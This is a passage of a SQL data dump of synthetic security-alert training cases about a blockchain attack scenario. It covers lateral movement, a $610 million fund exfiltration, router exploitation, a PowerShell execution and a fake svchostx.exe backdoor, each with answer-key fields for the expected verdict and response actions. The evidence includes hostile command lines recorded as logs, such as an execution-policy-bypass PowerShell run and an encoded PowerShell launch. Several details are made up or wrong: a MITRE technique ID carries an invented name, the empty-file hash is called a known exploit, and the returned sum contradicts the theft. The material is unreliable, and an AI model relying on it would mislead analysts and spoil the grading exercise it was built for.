4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:45:30Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"malicious_contract_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"contract_name\\\":\\\"EternalAccess.sol\\\",\\\"attacker_username\\\":\\\"contract_deployer\\\",\\\"detected_by\\\":\\\"Smart Contract Analysis Tool v2.7\\\",\\\"event_id\\\":\\\"SC-20231001-003\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1006, 'Lateral Movement Across Blockchain Networks', 'high', 'Network Flow Analysis', 'An advanced attacker is leveraging the interconnected nature of blockchain networks to move laterally, obscuring their trail and maximizing the impact of their exploit. The attacker has been detected moving from an internal blockchain node to an external node using known malicious IPs and hashes.', 'Lateral Movement', 'T1080 (Taint Shared Content)', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:35:47Z\",\"source_ip\":\"10.0.15.23\",\"destination_ip\":\"45.76.112.99\",\"malicious_ip\":\"192.168.1.10\",\"username\":\"blockchain_admin\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malicious_hash\":\"e99a18c428cb38d5f260853678922e03\",\"event_type\":\"lateral_movement\",\"filename\":\"blockchain_data_transfer.exe\",\"protocol\":\"TCP\",\"port\":8333}', '2026-01-17 03:47:32', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.76.112.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with APT operations.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash linked to a known blockchain-targeted malware variant.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"blockchain_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate internal user account.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"blockchain_data_transfer.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Endpoint Security Logs\",\"verdict\":\"suspicious\",\"details\":\"Unusual executable used for data transfer detected.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1007, 'Massive Fund Exfiltration Detected', 'critical', 'Financial Transaction Alerts', 'A large-scale fund transfer is detected, as the attacker exfiltrates $610 million from the platform, triggering financial transaction alerts.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T03:45:12Z\",\"event_type\":\"transaction_alert\",\"platform\":\"DeFiPlatformX\",\"transaction_id\":\"tx1234567890\",\"source_ip\":\"10.23.45.67\",\"destination_ip\":\"185.123.45.67\",\"amount_usd\":\"610000000\",\"user_account\":\"attacker_account_123\",\"malware_hash\":\"3b5d5c3712955042212316173ccf37be\",\"file_name\":\"exfiltration_script.py\",\"status\":\"completed\"}', '2026-01-17 03:47:32', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.23.45.67\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.123.45.67\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP involved in previous exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3b5d5c3712955042212316173ccf37be\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known exfiltration malware used by APT groups.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"exfiltration_script.py\",\"is_critical\":true,\"osint_result\":{\"source\":\"file analysis\",\"verdict\":\"malicious\",\"details\":\"Script used to automate fund transfers.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"attacker_account_123\",\"is_critical\":true,\"osint_result\":{\"source\":\"account review\",\"verdict\":\"suspicious\",\"details\":\"Account involved in unauthorized large fund transfers.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.704Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:12Z\\\",\\\"event_type\\\":\\\"transaction_alert\\\",\\\"platform\\\":\\\"DeFiPlatformX\\\",\\\"transaction_id\\\":\\\"tx1234567890\\\",\\\"source_ip\\\":\\\"10.23.45.67\\\",\\\"destination_ip\\\":\\\"185.123.45.67\\\",\\\"amount_usd\\\":\\\"610000000\\\",\\\"user_account\\\":\\\"attacker_account_123\\\",\\\"malware_hash\\\":\\\"3b5d5c3712955042212316173ccf37be\\\",\\\"file_name\\\":\\\"exfiltration_script.py\\\",\\\"status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.704Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:12Z\\\",\\\"event_type\\\":\\\"transaction_alert\\\",\\\"platform\\\":\\\"DeFiPlatformX\\\",\\\"transaction_id\\\":\\\"tx1234567890\\\",\\\"source_ip\\\":\\\"10.23.45.67\\\",\\\"destination_ip\\\":\\\"185.123.45.67\\\",\\\"amount_usd\\\":\\\"610000000\\\",\\\"user_account\\\":\\\"attacker_account_123\\\",\\\"malware_hash\\\":\\\"3b5d5c3712955042212316173ccf37be\\\",\\\"file_name\\\":\\\"exfiltration_script.py\\\",\\\"status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.704Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:12Z\\\",\\\"event_type\\\":\\\"transaction_alert\\\",\\\"platform\\\":\\\"DeFiPlatformX\\\",\\\"transaction_id\\\":\\\"tx1234567890\\\",\\\"source_ip\\\":\\\"10.23.45.67\\\",\\\"destination_ip\\\":\\\"185.123.45.67\\\",\\\"amount_usd\\\":\\\"610000000\\\",\\\"user_account\\\":\\\"attacker_account_123\\\",\\\"malware_hash\\\":\\\"3b5d5c3712955042212316173ccf37be\\\",\\\"file_name\\\":\\\"exfiltration_script.py\\\",\\\"status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.704Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:12Z\\\",\\\"event_type\\\":\\\"transaction_alert\\\",\\\"platform\\\":\\\"DeFiPlatformX\\\",\\\"transaction_id\\\":\\\"tx1234567890\\\",\\\"source_ip\\\":\\\"10.23.45.67\\\",\\\"destination_ip\\\":\\\"185.123.45.67\\\",\\\"amount_usd\\\":\\\"610000000\\\",\\\"user_account\\\":\\\"attacker_account_123\\\",\\\"malware_hash\\\":\\\"3b5d5c3712955042212316173ccf37be\\\",\\\"file_name\\\":\\\"exfiltration_script.py\\\",\\\"status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.704Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:12Z\\\",\\\"event_type\\\":\\\"transaction_alert\\\",\\\"platform\\\":\\\"DeFiPlatformX\\\",\\\"transaction_id\\\":\\\"tx1234567890\\\",\\\"source_ip\\\":\\\"10.23.45.67\\\",\\\"destination_ip\\\":\\\"185.123.45.67\\\",\\\"amount_usd\\\":\\\"610000000\\\",\\\"user_account\\\":\\\"attacker_account_123\\\",\\\"malware_hash\\\":\\\"3b5d5c3712955042212316173ccf37be\\\",\\\"file_name\\\":\\\"exfiltration_script.py\\\",\\\"status\\\":\\\"completed\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1008, 'Unexpected Return of Funds and Dialogue Initiated', 'medium', 'Communication Channels', 'In an unexpected turn, the attacker returned the stolen funds and initiated a dialogue with the victim. The conversation raised questions about the motives and ethical considerations behind the attack.', 'Unusual Behavior', 'T1589 - Engage in Dialogue', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T15:45:00Z\",\"event_id\":\"evt123456\",\"source_ip\":\"173.194.55.0\",\"destination_ip\":\"10.0.0.5\",\"username\":\"john.doe\",\"email\":\"attacker@example.com\",\"subject\":\"Returning Your Funds\",\"message_body\":\"We have decided to return the funds. Let\'s talk about potential collaboration.\",\"file_name\":\"refund_transaction.txt\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"transaction_id\":\"txn098765\",\"amount_returned\":5000,\"currency\":\"USD\"}', '2026-01-17 03:47:32', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"173.194.55.0\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"attacker@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Email associated with previous phishing campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No associated malware found.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.705Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:45:00Z\\\",\\\"event_id\\\":\\\"evt123456\\\",\\\"source_ip\\\":\\\"173.194.55.0\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"john.doe\\\",\\\"email\\\":\\\"attacker@example.com\\\",\\\"subject\\\":\\\"Returning Your Funds\\\",\\\"message_body\\\":\\\"We have decided to return the funds. Let\'s talk about potential collaboration.\\\",\\\"file_name\\\":\\\"refund_transaction.txt\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"transaction_id\\\":\\\"txn098765\\\",\\\"amount_returned\\\":5000,\\\"currency\\\":\\\"USD\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.705Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:45:00Z\\\",\\\"event_id\\\":\\\"evt123456\\\",\\\"source_ip\\\":\\\"173.194.55.0\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"john.doe\\\",\\\"email\\\":\\\"attacker@example.com\\\",\\\"subject\\\":\\\"Returning Your Funds\\\",\\\"message_body\\\":\\\"We have decided to return the funds. Let\'s talk about potential collaboration.\\\",\\\"file_name\\\":\\\"refund_transaction.txt\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"transaction_id\\\":\\\"txn098765\\\",\\\"amount_returned\\\":5000,\\\"currency\\\":\\\"USD\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.705Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:45:00Z\\\",\\\"event_id\\\":\\\"evt123456\\\",\\\"source_ip\\\":\\\"173.194.55.0\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"john.doe\\\",\\\"email\\\":\\\"attacker@example.com\\\",\\\"subject\\\":\\\"Returning Your Funds\\\",\\\"message_body\\\":\\\"We have decided to return the funds. Let\'s talk about potential collaboration.\\\",\\\"file_name\\\":\\\"refund_transaction.txt\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"transaction_id\\\":\\\"txn098765\\\",\\\"amount_returned\\\":5000,\\\"currency\\\":\\\"USD\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.705Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:45:00Z\\\",\\\"event_id\\\":\\\"evt123456\\\",\\\"source_ip\\\":\\\"173.194.55.0\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"john.doe\\\",\\\"email\\\":\\\"attacker@example.com\\\",\\\"subject\\\":\\\"Returning Your Funds\\\",\\\"message_body\\\":\\\"We have decided to return the funds. Let\'s talk about potential collaboration.\\\",\\\"file_name\\\":\\\"refund_transaction.txt\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"transaction_id\\\":\\\"txn098765\\\",\\\"amount_returned\\\":5000,\\\"currency\\\":\\\"USD\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.705Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:45:00Z\\\",\\\"event_id\\\":\\\"evt123456\\\",\\\"source_ip\\\":\\\"173.194.55.0\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"john.doe\\\",\\\"email\\\":\\\"attacker@example.com\\\",\\\"subject\\\":\\\"Returning Your Funds\\\",\\\"message_body\\\":\\\"We have decided to return the funds. Let\'s talk about potential collaboration.\\\",\\\"file_name\\\":\\\"refund_transaction.txt\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"transaction_id\\\":\\\"txn098765\\\",\\\"amount_returned\\\":5000,\\\"currency\\\":\\\"USD\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1009, 'Unprotected Router Exploitation Detected', 'high', 'Network Traffic Analysis', 'An attacker exploited a known vulnerability in T-Mobile\'s infrastructure, gaining initial access through an unprotected router.', 'Initial Access', 'T1190', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:23:45Z\",\"event_type\":\"network_connection_attempt\",\"source_ip\":\"203.0.113.25\",\"destination_ip\":\"10.0.0.5\",\"destination_port\":8080,\"protocol\":\"HTTP\",\"http_method\":\"GET\",\"url\":\"http://10.0.0.5/cgi-bin/login\",\"user_agent\":\"Mozilla/5.0 (compatible; RouterExploit/1.0)\",\"filename\":\"exploit_script.sh\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"admin\",\"http_headers\":{\"Host\":\"10.0.0.5\",\"Connection\":\"keep-alive\"}}', '2026-01-17 03:48:32', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple attacks on network infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"T-Mobile\'s internal router.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Known exploit script hash.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"exploit_script.sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Script used for exploiting router vulnerabilities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1010, 'Malicious Script Execution Identified', 'high', 'Endpoint Detection and Response (EDR)', 'A malicious script was executed on the host machine to establish persistence and escalate privileges. The script was initiated by the user \'jbinns\' from an external IP address known for malicious activities.', 'Execution', 'T1059 - Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:05Z\",\"event_type\":\"Execution\",\"host_ip\":\"192.168.1.101\",\"user\":\"jbinns\",\"process_name\":\"cmd.exe\",\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Windows\\\\Temp\\\\exploit.ps1\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.101\",\"filename\":\"exploit.ps1\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"event_id\":\"4624\",\"logon_type\":3}', '2026-01-17 03:48:32', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with recent APT campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious PowerShell script\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"exploit.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"Script used for privilege escalation\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jbinns\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"User account associated with unusual activity\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1011, 'Persistence Mechanism Established', 'high', 'System Logs', 'A hidden backdoor was established on host 192.168.1.45 allowing ongoing unauthorized access. The backdoor was introduced by executing a malicious executable \'svchostx.exe\' linked to the attacker IP 203.0.113.45.', 'Persistence', 'T1055.001 - Process Injection', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:30Z\",\"event_type\":\"process_creation\",\"host_ip\":\"192.168.1.45\",\"process_name\":\"svchostx.exe\",\"process_id\":4321,\"parent_process\":\"explorer.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"user\":\"Binns\",\"attacker_ip\":\"203.0.113.45\",\"command_line\":\"C:\\\\Windows\\\\System32\\\\svchostx.exe\",\"network_activity\":[{\"destination_ip\":\"203.0.113.45\",\"port\":443}]}', '2026-01-17 03:48:32', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal host IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_feeds\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"svchostx.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_analysis\",\"verdict\":\"malicious\",\"details\":\"Suspicious file mimicking legitimate Windows process.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash matched known malware sample.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.709Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:30Z\\\",\\\"event_type\\\":\\\"process_creation\\\",\\\"host_ip\\\":\\\"192.168.1.45\\\",\\\"process_name\\\":\\\"svchostx.exe\\\",\\\"process_id\\\":4321,\\\"parent_process\\\":\\\"explorer.exe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"user\\\":\\\"Binns\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchostx.exe\\\",\\\"network_activity\\\":[{\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"port\\\":443}]}\"},{\"timestamp\":\"2026-02-01T20:31:22.709Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:30Z\\\",\\\"event_type\\\":\\\"process_creation\\\",\\\"host_ip\\\":\\\"192.168.1.45\\\",\\\"process_name\\\":\\\"svchostx.exe\\\",\\\"process_id\\\":4321,\\\"parent_process\\\":\\\"explorer.exe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"user\\\":\\\"Binns\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchostx.exe\\\",\\\"network_activity\\\":[{\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"port\\\":443}]}\"},{\"timestamp\":\"2026-02-01T20:30:22.709Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:30Z\\\",\\\"event_type\\\":\\\"process_creation\\\",\\\"host_ip\\\":\\\"192.168.1.45\\\",\\\"process_name\\\":\\\"svchostx.exe\\\",\\\"process_id\\\":4321,\\\"parent_process\\\":\\\"explorer.exe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"user\\\":\\\"Binns\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchostx.exe\\\",\\\"network_activity\\\":[{\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"port\\\":443}]}\"},{\"timestamp\":\"2026-02-01T20:29:22.709Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:30Z\\\",\\\"event_type\\\":\\\"process_creation\\\",\\\"host_ip\\\":\\\"192.168.1.45\\\",\\\"process_name\\\":\\\"svchostx.exe\\\",\\\"process_id\\\":4321,\\\"parent_process\\\":\\\"explorer.exe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"user\\\":\\\"Binns\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchostx.exe\\\",\\\"network_activity\\\":[{\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"port\\\":443}]}\"},{\"timestamp\":\"2026-02-01T20:28:22.709Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 